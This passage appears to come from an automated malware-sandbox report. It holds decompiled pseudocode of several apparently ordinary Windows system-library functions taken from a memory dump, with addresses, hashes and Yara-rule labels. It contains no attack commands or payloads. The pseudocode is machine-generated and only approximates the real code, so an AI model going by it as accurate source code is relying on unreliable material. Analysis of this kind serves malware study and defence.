				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03479670() < 0) {
					L0348DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x3527b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L03454620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0346E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                          0x0346e730
                                                          0x0346e736
                                                          0x0346e738
                                                          0x0346e73d
                                                          0x0346e73e
                                                          0x0346e740
                                                          0x0346e749
                                                          0x0346e765
                                                          0x0346e76a
                                                          0x0346e76b
                                                          0x0346e76c
                                                          0x0346e76d
                                                          0x0346e76e
                                                          0x0346e76f
                                                          0x0346e775
                                                          0x0346e777
                                                          0x0346e77e
                                                          0x034ab675
                                                          0x0346e784
                                                          0x0346e784
                                                          0x0346e789
                                                          0x0346e7a8
                                                          0x0346e7ac
                                                          0x0346e807
                                                          0x0346e7ae
                                                          0x0346e7ae
                                                          0x0346e7b1
                                                          0x0346e7b4
                                                          0x0346e7b9
                                                          0x0346e7c0
                                                          0x0346e7c4
                                                          0x0346e7ca
                                                          0x0346e7cc
                                                          0x00000000
                                                          0x0346e7d3
                                                          0x0346e7d6
                                                          0x00000000
                                                          0x00000000
                                                          0x0346e7ff
                                                          0x0346e802
                                                          0x00000000
                                                          0x00000000
                                                          0x0346e7f9
                                                          0x0346e7fc
                                                          0x00000000
                                                          0x00000000
                                                          0x0346e7f3
                                                          0x0346e7f6
                                                          0x00000000
                                                          0x00000000
                                                          0x0346e7ed
                                                          0x0346e7f0
                                                          0x00000000
                                                          0x00000000
                                                          0x0346e7e7
                                                          0x0346e7ea
                                                          0x00000000
                                                          0x00000000
                                                          0x034ab685
                                                          0x034ab688
                                                          0x00000000
                                                          0x00000000
                                                          0x034ab682
                                                          0x00000000
                                                          0x00000000
                                                          0x0346e7cc
                                                          0x0346e7d9
                                                          0x0346e7dc
                                                          0x0346e7de
                                                          0x0346e7de
                                                          0x0346e7ac
                                                          0x0346e7e4
                                                          0x0346e74b
                                                          0x0346e751
                                                          0x0346e759
                                                          0x0346e761
                                                          0x0346e761

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 279175a56be4edeeadb9ab416eb1eebdf93ec20c94c22c53ceb0d2580ced5723
                                                          • Instruction ID: 98cffd76bae92502fd743c12a00484cf88ec4a46c5bfdd812711ea410f5a04ad
                                                          • Opcode Fuzzy Hash: 279175a56be4edeeadb9ab416eb1eebdf93ec20c94c22c53ceb0d2580ced5723
                                                          • Instruction Fuzzy Hash: EB318D79A14249EFD704DF59C940F9AB7E8FB09310F14825AF914CF341E631E880CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0346BC2C, Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 67%
                                                          			E0346BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x3526100; // 0xa
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E03452280(0xd, 0x109bf1a0);
				_t41 =  *0x35260f8; // 0x0
				if(_t41 != 0) {
					 *0x35260f8 =  *_t41;
					 *0x35260fc =  *0x35260fc + 0xffff;
				}
				E0344FFB0(_t41, 0x800, 0x109bf1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x35260f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L03454620(0x3526100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x3526100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                          0x0346bc36
                                                          0x0346bc42
                                                          0x0346bc45
                                                          0x0346bc4a
                                                          0x0346bd35
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0346bc50
                                                          0x0346bc50
                                                          0x0346bc58
                                                          0x0346bc5a
                                                          0x0346bc60
                                                          0x00000000
                                                          0x00000000
                                                          0x034aa4f2
                                                          0x034aa4f6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034aa4fc
                                                          0x0346bc79
                                                          0x0346bc7e
                                                          0x0346bc86
                                                          0x0346bd16
                                                          0x0346bd20
                                                          0x0346bd20
                                                          0x0346bc8d
                                                          0x0346bc94
                                                          0x0346bcbd
                                                          0x0346bcca
                                                          0x0346bccb
                                                          0x0346bccc
                                                          0x0346bccd
                                                          0x0346bcce
                                                          0x0346bcd4
                                                          0x0346bcea
                                                          0x0346bcee
                                                          0x0346bcf2
                                                          0x0346bd00
                                                          0x0346bd04
                                                          0x00000000
                                                          0x0346bc96
                                                          0x0346bcab
                                                          0x0346bcaf
                                                          0x0346bd2c
                                                          0x0346bd2c
                                                          0x0346bd09
                                                          0x00000000
                                                          0x0346bd09
                                                          0x0346bcb1
                                                          0x0346bcb5
                                                          0x0346bcbb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0346bcbb

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a248b366fb1005ac45392b9b21c5e0cd4280ca426ade4d3456478d814483bd60
                                                          • Instruction ID: ba0d5f5368cb286cfdd0ae432b529eb68d7749c6fe3e762b8da57133fce37c65
                                                          • Opcode Fuzzy Hash: a248b366fb1005ac45392b9b21c5e0cd4280ca426ade4d3456478d814483bd60
                                                          • Instruction Fuzzy Hash: 8931F236A006569FCB11EF59D480BA673A4FF29310F14407AED44DF346EBB4DA0ADB89
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03439100, Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 76%
                                                          			E03439100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x350f6e8);
				E0348D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E035088F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0348D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x35286c0; // 0x2fd07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x35286b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E03452280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E035088F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0347AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x352b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x35284c0;
										if(_t69 >=  *0x35284c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E03509063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0343922A(_t82);
							_t53 = E03457D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E03508B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x35286c0; // 0x2fd07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x35286b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x35286bc;
										_t72 = 0x35286b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E03439240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x35286c4;
									_t72 = 0x35286c0;
									L18:
									E03469B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                          0x03439100
                                                          0x03439100
                                                          0x03439100
                                                          0x03439100
                                                          0x03439102
                                                          0x03439107
                                                          0x0343910c
                                                          0x03439110
                                                          0x03439115
                                                          0x03439136
                                                          0x03439143
                                                          0x034937e4
                                                          0x034937e4
                                                          0x03439149
                                                          0x0343914e
                                                          0x0343914e
                                                          0x03439117
                                                          0x0343911d
                                                          0x00000000
                                                          0x00000000
                                                          0x0343911f
                                                          0x03439125
                                                          0x00000000
                                                          0x03439151
                                                          0x03439158
                                                          0x0343915d
                                                          0x03439161
                                                          0x03439168
                                                          0x03493715
                                                          0x00000000
                                                          0x0343916e
                                                          0x0343916e
                                                          0x03439175
                                                          0x03439177
                                                          0x0343917e
                                                          0x0343917f
                                                          0x03439182
                                                          0x03439182
                                                          0x03439187
                                                          0x03439187
                                                          0x0343918a
                                                          0x0343918d
                                                          0x0343918f
                                                          0x03439192
                                                          0x03439195
                                                          0x03439198
                                                          0x03439198
                                                          0x03439198
                                                          0x0343919a
                                                          0x00000000
                                                          0x00000000
                                                          0x0349371f
                                                          0x03493721
                                                          0x03493727
                                                          0x0349372f
                                                          0x03493733
                                                          0x03493735
                                                          0x03493738
                                                          0x0349373b
                                                          0x0349373d
                                                          0x03493740
                                                          0x00000000
                                                          0x00000000
                                                          0x03493746
                                                          0x03493749
                                                          0x00000000
                                                          0x00000000
                                                          0x0349374f
                                                          0x03493751
                                                          0x00000000
                                                          0x00000000
                                                          0x03493757
                                                          0x03493759
                                                          0x0349375c
                                                          0x0349375c
                                                          0x0349375e
                                                          0x0349375e
                                                          0x03493761
                                                          0x03493764
                                                          0x00000000
                                                          0x00000000
                                                          0x03493766
                                                          0x03493768
                                                          0x034937a3
                                                          0x034937a3
                                                          0x034937a5
                                                          0x034937a7
                                                          0x034937ad
                                                          0x034937b0
                                                          0x034937b2
                                                          0x034937bc
                                                          0x034937c2
                                                          0x034937c2
                                                          0x034937b2
                                                          0x03439187
                                                          0x03439187
                                                          0x0343918a
                                                          0x0343918d
                                                          0x0343918f
                                                          0x03439192
                                                          0x03439195
                                                          0x00000000
                                                          0x03439195
                                                          0x00000000
                                                          0x03439187
                                                          0x0349376a
                                                          0x0349376a
                                                          0x0349376c
                                                          0x0349376c
                                                          0x0349376f
                                                          0x03493775
                                                          0x00000000
                                                          0x00000000
                                                          0x03493777
                                                          0x03493779
                                                          0x00000000
                                                          0x00000000
                                                          0x03493782
                                                          0x03493787
                                                          0x03493789
                                                          0x03493790
                                                          0x03493790
                                                          0x0349378b
                                                          0x0349378b
                                                          0x0349378b
                                                          0x03493792
                                                          0x03493795
                                                          0x03493795
                                                          0x03493798
                                                          0x03493798
                                                          0x0349379b
                                                          0x0349379b
                                                          0x034391a3
                                                          0x034391a9
                                                          0x034391b0
                                                          0x034391b4
                                                          0x034391b4
                                                          0x034391bb
                                                          0x034391c0
                                                          0x034391c5
                                                          0x034391c7
                                                          0x034937da
                                                          0x034391cd
                                                          0x034391cd
                                                          0x034391cd
                                                          0x034391d2
                                                          0x034391d5
                                                          0x03439239
                                                          0x03439239
                                                          0x034391d7
                                                          0x034391db
                                                          0x034391e1
                                                          0x034391e7
                                                          0x034391fd
                                                          0x03439203
                                                          0x0343921e
                                                          0x03439223
                                                          0x00000000
                                                          0x03439223
                                                          0x03439205
                                                          0x03439208
                                                          0x0343920c
                                                          0x03439214
                                                          0x03439214
                                                          0x034391e9
                                                          0x034391e9
                                                          0x034391ee
                                                          0x034391f3
                                                          0x034391f3
                                                          0x034391f3
                                                          0x034391e7
                                                          0x00000000
                                                          0x034391db
                                                          0x03439187
                                                          0x03439168

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b741214b896d10728ad9076f00774c060cbd431c33985a32b3333ecef398b54
                                                          • Instruction ID: c63dad483b33517a1a72f40ad7a2546c8dbc4aeb82fa40516df067056cf9fb67
                                                          • Opcode Fuzzy Hash: 3b741214b896d10728ad9076f00774c060cbd431c33985a32b3333ecef398b54
                                                          • Instruction Fuzzy Hash: 3D319375A056459FEF25DFA8C488B9EBBB1BB4A310F1C819BC4147F391C3B1A940CB99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03461DB5, Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 60%
                                                          			E03461DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0345F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L03454620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0345F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                          0x03461dc2
                                                          0x03461dc5
                                                          0x03461dc7
                                                          0x03461dcc
                                                          0x03461dce
                                                          0x03461dd6
                                                          0x03461ddf
                                                          0x03461de0
                                                          0x03461de1
                                                          0x03461de5
                                                          0x03461de8
                                                          0x03461def
                                                          0x03461df0
                                                          0x03461df6
                                                          0x03461df7
                                                          0x03461dfe
                                                          0x03461e1a
                                                          0x00000000
                                                          0x00000000
                                                          0x03461e0b
                                                          0x03461e12
                                                          0x03461e12
                                                          0x03461e00
                                                          0x03461e00
                                                          0x03461e05
                                                          0x03461e1e
                                                          0x03461e23
                                                          0x034a570f
                                                          0x034a5713
                                                          0x00000000
                                                          0x00000000
                                                          0x034a5719
                                                          0x034a5719
                                                          0x03461e2c
                                                          0x03461e2d
                                                          0x03461e2e
                                                          0x03461e2f
                                                          0x03461e31
                                                          0x03461e32
                                                          0x03461e35
                                                          0x03461e3d
                                                          0x034a5723
                                                          0x034a573d
                                                          0x034a573d
                                                          0x00000000
                                                          0x034a5723
                                                          0x03461e49
                                                          0x03461e4e
                                                          0x03461e4e
                                                          0x03461e09
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                          • Instruction ID: dadcef36d366a93d80ee31edd5c32240f2d9f4f1010bb7452f0dfb6ab5827259
                                                          • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                          • Instruction Fuzzy Hash: 8A218B36A40218EFC720CF99C880EAFBBB9EF85641F15405AE9059F620D634EE11CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03450050, Relevance: .1, Instructions: 81COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E03450050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x352d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E03469ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0347B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E03508A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E03469702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x352b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                          0x03450055
                                                          0x0345005d
                                                          0x03450062
                                                          0x0345006c
                                                          0x0345006f
                                                          0x03450074
                                                          0x0345007a
                                                          0x0345007a
                                                          0x03450080
                                                          0x03450080
                                                          0x03450087
                                                          0x0345008d
                                                          0x0345008f
                                                          0x03450093
                                                          0x03450095
                                                          0x0345009b
                                                          0x034500f8
                                                          0x034500fb
                                                          0x034500fc
                                                          0x034500ff
                                                          0x03450108
                                                          0x03450108
                                                          0x034500a2
                                                          0x034500a6
                                                          0x034500b3
                                                          0x034500bc
                                                          0x034500c5
                                                          0x034500ca
                                                          0x0349c01e
                                                          0x00000000
                                                          0x00000000
                                                          0x0349c02d
                                                          0x034500d5
                                                          0x034500d9
                                                          0x0349c03d
                                                          0x0349c046
                                                          0x0349c046
                                                          0x034500df
                                                          0x034500e2
                                                          0x034500ea
                                                          0x034500ef
                                                          0x034500f2
                                                          0x034500f6
                                                          0x03450111
                                                          0x03450117
                                                          0x03450117
                                                          0x00000000
                                                          0x034500f6
                                                          0x034500d0
                                                          0x034500d0
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79d5d23f73af9f4fd42eac6e4b7ca14b5664070094655efc4a6ced6f767bc1e6
                                                          • Instruction ID: c442ad18688a282b03c819d69a8ba51b755bcb7c0a352513ec1440aa7a7b6462
                                                          • Opcode Fuzzy Hash: 79d5d23f73af9f4fd42eac6e4b7ca14b5664070094655efc4a6ced6f767bc1e6
                                                          • Instruction Fuzzy Hash: 8E318036601B04DFD721CF28D840B57B3E5FF89714F18456EE8968B790DB75A802CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034B6C0A, Relevance: .1, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E034B6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E03457D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x3527b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L03454620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0347F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E03457D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03479AE0();
						_t23 = L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                          0x034b6c0a
                                                          0x034b6c0f
                                                          0x034b6c10
                                                          0x034b6c13
                                                          0x034b6c15
                                                          0x034b6c19
                                                          0x034b6c1c
                                                          0x034b6c21
                                                          0x034b6c28
                                                          0x034b6c3a
                                                          0x034b6c2a
                                                          0x034b6c33
                                                          0x034b6c33
                                                          0x034b6c3f
                                                          0x034b6c48
                                                          0x034b6c4d
                                                          0x034b6c60
                                                          0x034b6c65
                                                          0x034b6c69
                                                          0x034b6c73
                                                          0x034b6c79
                                                          0x034b6c7f
                                                          0x034b6c86
                                                          0x034b6c90
                                                          0x034b6c94
                                                          0x034b6ca6
                                                          0x034b6cb2
                                                          0x034b6cbd
                                                          0x034b6cbd
                                                          0x034b6cc3
                                                          0x034b6cc7
